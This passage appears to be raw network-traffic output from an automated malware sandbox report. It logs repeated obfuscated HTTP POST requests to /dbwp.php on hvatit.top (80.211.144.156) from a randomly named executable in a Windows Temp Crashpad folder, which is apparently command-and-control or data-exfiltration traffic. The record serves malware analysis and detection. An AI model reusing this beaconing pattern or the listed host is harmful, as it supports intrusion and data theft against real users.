                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:33.427269936 CEST2560OUTData Raw: 5f 5e 5c 56 5a 5f 50 55 5d 5f 54 57 54 5a 5b 51 5a 56 59 5e 52 54 54 5a 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _^\VZ_PU]_TWTZ[QZVY^RTTZQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.X'!)=:+"89, <V$8Q'($.-<<<.?!]'/Z,-
                                                        Aug 31, 2024 09:32:33.755444050 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:34.091114998 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:33 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ
                                                        Aug 31, 2024 09:32:34.309154987 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:33 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        26192.168.2.44976280.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:34.309899092 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2548
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:34.661679029 CEST2548OUTData Raw: 5a 5c 5c 52 5a 5f 50 54 5d 5f 54 57 54 58 5b 54 5a 55 59 5e 52 57 54 58 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z\\RZ_PT]_TWTX[TZUY^RWTXQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.31&A<'#-#,<Z#+V'9#36<3-"W+;3_(?78?!]'/Z,!
                                                        Aug 31, 2024 09:32:35.002019882 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:35.139503002 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:34 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        27192.168.2.44976380.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:35.274986029 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:35.630455017 CEST2560OUTData Raw: 5f 58 59 53 5a 54 55 55 5d 5f 54 57 54 5f 5b 51 5a 57 59 5c 52 55 54 5a 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _XYSZTUU]_TWT_[QZWY\RUTZQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-$W*C+_45+:,4'$$%'0>(/]?,;!]'/Z,
                                                        Aug 31, 2024 09:32:36.002275944 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:36.136115074 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:35 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        28192.168.2.44976480.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:36.257080078 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:36.616205931 CEST2560OUTData Raw: 5a 5a 59 5f 5a 55 55 51 5d 5f 54 57 54 51 5b 5d 5a 52 59 52 52 54 54 5f 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZZY_ZUUQ]_TWTQ[]ZRYRRTT_Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-'".=:7!$-<+ 00 V'409*;=<U//!]'/Z,
                                                        Aug 31, 2024 09:32:36.937262058 CEST25INHTTP/1.1 100 Continue


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        29192.168.2.44976580.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:36.966123104 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 1408
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:37.318386078 CEST1408OUTData Raw: 5a 55 5c 56 5f 5e 55 50 5d 5f 54 57 54 58 5b 54 5a 57 59 59 52 5d 54 5b 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZU\V_^UP]_TWTX[TZWYYR]T[Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-&1-+S5([-?34')73<09(+](,W/!]'/Z,)
                                                        Aug 31, 2024 09:32:37.634084940 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:37.767995119 CEST308INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:37 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 152
                                                        Connection: keep-alive
                                                        Data Raw: 0c 15 20 0f 30 06 08 57 20 3b 35 0f 2a 12 3d 1c 24 0e 38 06 2c 31 36 59 3e 07 38 03 3d 39 38 51 30 3d 01 01 25 38 32 1f 25 3c 30 10 24 0e 21 5b 07 10 22 12 25 00 20 03 2c 02 0b 00 31 0e 3e 07 37 0f 3e 17 29 3d 2a 00 35 05 22 02 30 16 26 19 2e 39 26 56 2b 10 01 13 3d 28 2c 5e 27 38 2b 50 00 12 26 19 26 59 23 0a 22 10 36 10 36 06 3f 10 27 0b 01 1d 20 02 3c 11 3f 06 3e 0b 24 2f 21 0e 37 09 25 12 32 22 32 5a 2b 00 2b 50 2a 06 26 5d 2e 01 23 56 02 36 59 56
                                                        Data Ascii: 0W ;5*=$8,16Y>8=98Q0=%82%<0$!["% ,1>7>)=*5"0&.9&V+=(,^'8+P&&Y#"66?' <?>$/!7%2"2Z++P*&].#V6YV


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        30192.168.2.44976680.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:37.086169004 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2552
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:37.442905903 CEST2552OUTData Raw: 5f 59 59 5f 5a 54 50 50 5d 5f 54 57 54 58 5b 50 5a 53 59 59 52 56 54 52 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _YY_ZTPP]_TWTX[PZSYYRVTRQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-3!)?;6>$],,48'*00$$-R<;(?<;!]'/Z,5
                                                        Aug 31, 2024 09:32:37.783919096 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:37.932884932 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:37 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        31192.168.2.44976780.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:38.054759979 CEST218OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:32:38.411644936 CEST2560OUTData Raw: 5a 5f 59 51 5a 59 50 53 5d 5f 54 57 54 5b 5b 5d 5a 51 59 5d 52 5c 54 5e 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: Z_YQZYPS]_TWT[[]ZQY]R\T^Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.Z&2.?),T5X?-,7^43' U3+0=.?\(??./!]'/Z,)
                                                        Aug 31, 2024 09:32:38.734653950 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:38.867697954 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:38 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        32192.168.2.44976880.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:38.990080118 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:39.349270105 CEST2560OUTData Raw: 5a 55 59 52 5f 58 55 51 5d 5f 54 57 54 5b 5b 51 5a 54 59 5e 52 57 54 5f 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZUYR_XUQ]_TWT[[QZTY^RWT_Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-$:D=95=7,<7 ;40:(V$5$>"?;/Y+T/!]'/Z,)
                                                        Aug 31, 2024 09:32:39.676863909 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:39.813791990 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:39 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        33192.168.2.44976980.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:39.945157051 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:40.361609936 CEST2560OUTData Raw: 5f 5e 5c 55 5a 5b 50 53 5d 5f 54 57 54 5c 5b 5c 5a 55 59 53 52 50 54 59 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _^\UZ[PS]_TWT\[\ZUYSRPTYQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-'*D+T!.4\.<48#'9('%($S++/\??7R,?!]'/Z,5
                                                        Aug 31, 2024 09:32:40.629313946 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:40.763741016 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:40 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        34192.168.2.44977080.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:40.897130013 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:41.255403996 CEST2560OUTData Raw: 5f 5d 59 5e 5f 59 55 51 5d 5f 54 57 54 59 5b 53 5a 52 59 53 52 5d 54 5f 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _]Y^_YUQ]_TWTY[SZRYSR]T_Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-01)(#><:<;X 8#&9$3%':<;?,#,!]'/Z,!
                                                        Aug 31, 2024 09:32:41.571801901 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:41.774658918 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:41 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        35192.168.2.44977180.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:41.898673058 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:42.255383968 CEST2560OUTData Raw: 5f 58 59 55 5f 59 50 54 5d 5f 54 57 54 50 5b 5c 5a 57 59 5f 52 57 54 5c 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _XYU_YPT]_TWTP[\ZWY_RWT\Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.Y01@(9$6.94&*367^&=-+(#_(,/T,?!]'/Z,
                                                        Aug 31, 2024 09:32:42.565608025 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:42.696609974 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:42 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        36192.168.2.44977280.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:42.782304049 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 1436
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:43.164880037 CEST1436OUTData Raw: 5f 5e 59 5e 5a 5a 50 50 5d 5f 54 57 54 5f 5b 56 5a 52 59 5c 52 55 54 59 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _^Y^ZZPP]_TWT_[VZRY\RUTYQ\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-&12D?* !.<[./87<$;&6 0>1<]8?',?!]'/Z,
                                                        Aug 31, 2024 09:32:43.466306925 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:43.670990944 CEST308INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:43 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 152
                                                        Connection: keep-alive
                                                        Data Raw: 0c 15 23 57 33 38 0f 0f 37 3b 04 1f 2a 2c 2d 1e 27 09 3f 58 2c 21 25 03 2a 3a 23 12 2a 14 3f 08 30 3d 3b 01 30 01 36 55 32 3c 2b 0d 27 1e 21 5b 07 10 22 12 25 58 3f 5d 38 2c 2a 5a 32 09 3e 00 20 31 04 19 28 3d 39 10 21 15 35 16 27 3b 2e 52 2c 00 29 08 3f 2e 23 10 3d 06 3b 00 31 38 2b 50 00 12 26 56 31 3c 3b 0c 21 10 07 02 23 3b 3c 0d 33 35 33 13 20 2b 0e 59 29 2b 35 53 30 02 2e 51 23 0e 3d 58 26 0c 0f 04 28 00 2b 56 3e 2c 26 5d 2e 01 23 56 02 36 59 56
                                                        Data Ascii: #W387;*,-'?X,!%*:#*?0=;06U2<+'!["%X?]8,*Z2> 1(=9!5';.R,)?.#=;18+P&V1<;!#;<353 +Y)+5S0.Q#=X&(+V>,&].#V6YV


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        37192.168.2.44977380.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:42.845426083 CEST242OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Aug 31, 2024 09:32:43.251605988 CEST2560OUTData Raw: 5f 5d 5c 53 5f 58 50 55 5d 5f 54 57 54 51 5b 50 5a 52 59 53 52 50 54 5c 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: _]\S_XPU]_TWTQ[PZRYSRPT\Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY.'*+'"?.,X 808'5#'-:S++3+7./!]'/Z,
                                                        Aug 31, 2024 09:32:43.521007061 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:43.648267984 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:43 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        38192.168.2.44977480.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:43.774976969 CEST218OUTPOST /dbwp.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                        Host: hvatit.top
                                                        Content-Length: 2560
                                                        Expect: 100-continue
                                                        Aug 31, 2024 09:32:44.130479097 CEST2560OUTData Raw: 5a 54 59 54 5f 5d 50 50 5d 5f 54 57 54 5d 5b 52 5a 51 59 5f 52 57 54 5d 51 5c 41 5d 52 5f 5a 50 59 5c 5f 58 5c 5d 50 50 58 5e 57 51 59 53 5b 5f 54 58 58 5e 58 5f 59 50 54 59 51 5b 5b 51 57 5d 58 54 5c 5f 51 58 5b 59 5c 5a 5f 5a 5a 59 58 57 52 58
                                                        Data Ascii: ZTYT_]PP]_TWT][RZQY_RWT]Q\A]R_ZPY\_X\]PPX^WQYS[_TXX^X_YPTYQ[[QW]XT\_QX[Y\Z_ZZYXWRXQUS[U[Q^ZX^_QSSYYUX\BQY\Y_Z^AWZG\Y[YV_PYZR\]]T]R[Y[R]_B[UVW_YZTQ_ZWYZZ^^[]X\Z^XS^]V[WWXZU[S\V^^Q^Q_]TY-'")+754-/34$R'\7$6;^'2T*(3(,!]'/Z,1
                                                        Aug 31, 2024 09:32:44.439225912 CEST25INHTTP/1.1 100 Continue
                                                        Aug 31, 2024 09:32:44.573343992 CEST158INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Sat, 31 Aug 2024 07:32:44 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 4
                                                        Connection: keep-alive
                                                        Data Raw: 3e 5d 5a 5a
                                                        Data Ascii: >]ZZ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        39192.168.2.44977580.211.144.156807668C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        TimestampBytes transferredDirectionData
                                                        Aug 31, 2024 09:32:44.693892002 CEST242OUTPOST /dbwp.php HTTP/1.1
